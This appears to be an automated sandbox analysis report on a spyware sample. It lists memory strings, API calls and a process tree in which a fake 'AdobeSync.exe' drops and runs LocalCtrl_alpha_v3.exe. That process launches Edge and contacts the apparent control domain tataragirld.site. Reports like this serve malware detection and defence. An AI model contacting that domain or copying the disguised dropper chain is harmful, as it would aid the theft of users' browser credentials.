Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1978883225.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034065698.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comAccess-Control-Allow-Credentials:
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comAccess-Control-Expose-Headers:
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060867589.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comcache-control:public
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2034926704.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comreport-to:
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odvr.nic.cz/doh
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/r
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sn.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.00000000080FF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1799166983.0000000000686000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2206867453.0000000000686000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2182937317.0000000000686000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2143180060.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2161763361.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site//3
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2184765975.0000000002E19000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/2009_New_England_Patriots_season
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2184765975.0000000002E19000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGV
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/2009_New_England_Patriots_seasono
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2206867453.0000000000686000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1807247260.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/?3d
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1799166983.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/c3
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2170307750.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/g3
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2152916730.0000000000642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site:443/2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2Bg
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.clarity.ms
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2033501954.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.00000000080FF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007F5B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007F6B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2005803456.0000000007F5B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007839232.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007F73000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2059495533.0000000007F6B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060867589.0000000007F6F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.nic.cz/odvr/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.nic.cz/odvr/har
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeFile deleted: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeJump to behavior
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
Source: LocalCtrl_alpha_v3.exe.5.drStatic PE information: Resource name: ZIP type: Zip archive data (empty)
Source: eekxwchdkwfcah.5.drStatic PE information: Number of sections : 12 > 10
Source: bkpxojga.11.drStatic PE information: Number of sections : 12 > 10
Source: LVkAi4PBv6.exe, 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegallon.exe4 vs LVkAi4PBv6.exe
Source: LVkAi4PBv6.exe, 00000002.00000003.1361979813.0000000001475000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite.dllX vs LVkAi4PBv6.exe
Source: LVkAi4PBv6.exe, 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamegallon.exe4 vs LVkAi4PBv6.exe
Source: LVkAi4PBv6.exe, 00000002.00000002.1366806926.000000006D39D000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameSharePoint.dllF vs LVkAi4PBv6.exe
Source: LVkAi4PBv6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: classification engineClassification label: mal100.spyw.evad.winEXE@64/276@22/15
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0089FE21 FormatMessageW,GetLastError,LocalFree,0_2_0089FE21
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008645EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,0_2_008645EE
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005C45EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,2_2_005C45EE
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008A304F GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,0_2_008A304F
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D367F40 LoadResource,LockResource,SizeofResource,2_2_6D367F40
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00886B88 ChangeServiceConfigW,GetLastError,0_2_00886B88
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeFile created: C:\Users\user\AppData\Roaming\PatchReaderWCFJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3396:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4236:120:WilError_03
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\Jump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: cabinet.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: msi.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: version.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: wininet.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: comres.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: clbcatq.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: msasn1.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: crypt32.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: feclient.dll0_2_00861070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: cabinet.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: msi.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: version.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: wininet.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: comres.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: clbcatq.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: msasn1.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: crypt32.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: feclient.dll2_2_005C1070
Source: LVkAi4PBv6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSystem information queried: HandleInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: LVkAi4PBv6.exe, 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: SELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmp;.\\?\\\?\UNC\\\invalid string position\ *AI_WSP_LISTAI_WSP_FEATURES_LIST[AI_WSP_URL]AI_SHAREPOINT_LOGAI_GLOBAL_WSPAI_LOCAL_WSPAI_NOT_VITAL_WSPAI_DEPLOY_WSP_CADATAAI_DEPLOY_WSP_CADATA_64AI_SHAREPOINT_STRINGS,|$^.cab.wspSharePoint.log-url [AI_WSP_URL] -allcontenturls-immediate-time-local-allowgacdeployment-allowcaspolicies-force-idSPAdminSPAdminV4SPTimerV3SPTimerV4
Source: LVkAi4PBv6.exe, 00000002.00000003.1361979813.0000000001475000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000003.1384998167.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394261032.000000006D303000.00000002.00000001.01000000.0000000B.sdmp, AdobeSync.exe, 00000004.00000002.1459672838.000000006D4D3000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: LVkAi4PBv6.exe, 00000002.00000003.1361979813.0000000001475000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000003.1384998167.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394261032.000000006D303000.00000002.00000001.01000000.0000000B.sdmp, AdobeSync.exe, 00000004.00000002.1459672838.000000006D4D3000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: LVkAi4PBv6.exe, 00000002.00000003.1361979813.0000000001475000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000003.1384998167.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394261032.000000006D303000.00000002.00000001.01000000.0000000B.sdmp, AdobeSync.exe, 00000004.00000002.1459672838.000000006D4D3000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: LVkAi4PBv6.exe, 00000002.00000003.1361979813.0000000001475000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000003.1384998167.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394261032.000000006D303000.00000002.00000001.01000000.0000000B.sdmp, AdobeSync.exe, 00000004.00000002.1459672838.000000006D4D3000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: INSERT INTO reporting_endpoints (nik, origin_scheme, origin_host, origin_port, group_name, url, priority, weight) VALUES (?,?,?,?,?,?,?,?)5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47X8
Source: LVkAi4PBv6.exe, 00000002.00000003.1361979813.0000000001475000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000003.1384998167.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394261032.000000006D303000.00000002.00000001.01000000.0000000B.sdmp, AdobeSync.exe, 00000004.00000002.1459672838.000000006D4D3000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E17000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1887495484.0000000002E8F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: LVkAi4PBv6.exe, 00000002.00000003.1361979813.0000000001475000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000003.1384998167.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394261032.000000006D303000.00000002.00000001.01000000.0000000B.sdmp, AdobeSync.exe, 00000004.00000002.1459672838.000000006D4D3000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: LVkAi4PBv6.exeReversingLabs: Detection: 23%
Source: LVkAi4PBv6.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeFile read: C:\Users\user\Desktop\LVkAi4PBv6.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\LVkAi4PBv6.exe "C:\Users\user\Desktop\LVkAi4PBv6.exe"
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeProcess created: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe "C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe" -burn.clean.room="C:\Users\user\Desktop\LVkAi4PBv6.exe" -burn.filehandle.attached=528 -burn.filehandle.self=552
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeProcess created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeProcess created: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe "C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe"
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,10255780505562275753,1680696743736403,262144 /prefetch:3
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7160 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7316 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7156 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeProcess created: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe "C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe" -burn.clean.room="C:\Users\user\Desktop\LVkAi4PBv6.exe" -burn.filehandle.attached=528 -burn.filehandle.self=552 Jump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeProcess created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeProcess created: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
